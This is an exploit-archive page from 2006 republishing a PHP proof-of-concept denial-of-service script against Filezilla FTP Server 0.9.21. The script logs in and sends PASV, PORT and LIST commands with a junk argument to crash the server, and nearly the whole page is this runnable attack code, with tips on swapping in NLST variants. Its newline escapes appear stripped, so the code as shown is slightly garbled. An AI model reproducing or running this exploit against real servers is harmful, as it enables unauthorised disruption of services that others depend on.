[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit
# Published : 2006-12-11
# Author : shinnai
# Previous Title : Microsoft Word Document (malformed pointer) Proof of Concept
# Next Title : D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit
<?php
# Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service
# by shinnai
# mail: shinnai[at]autistici[dot[org]
# site: http://shinnai.altervista.org
#
# special thanks to rgod for his first advisory about "STOR" Denial of service, see: http://retrogod.altervista.org/filezilla_0921_dos.html
# and for code in php I never could write alone ;)
# This one works fine also with an user with only read and list permissions enabled
# you can change the LIST command also with NLST or NLST -al comamnds
# tested on Windows XP Professional SP2 all patched
error_reporting(E_ALL);
$service_port = getservbyname('ftp', 'tcp');
$address = gethostbyname('127.0.0.1');
$user="test";
$pass="test";
$junk.="A*";
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed:n reason: " . socket_strerror($socket) . "n";
} else {
echo "OK.n";
}
$result = socket_connect($socket, $address, $service_port);
if ($result < 0) {
echo "socket_connect() failed:n reason: ($result) " . socket_strerror($result) . "n";
} else {
echo "OK.n";
}
$out=socket_read($socket, 240);
echo $out;
$in = "USER ".$user."rn";
socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80);
echo $out;
$in = "PASS ".$pass."rn";
socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80);
echo $out;
$in = "PASV ".$junk."rn";
socket_write($socket, $in, strlen ($in));
$in = "PORT ".$junk."rn";
socket_write($socket, $in, strlen ($in));
$in = "LIST ".$junk."rn";
socket_write($socket, $in, strlen ($in));
socket_close($socket);
?>
# www.Syue.com [2006-12-11]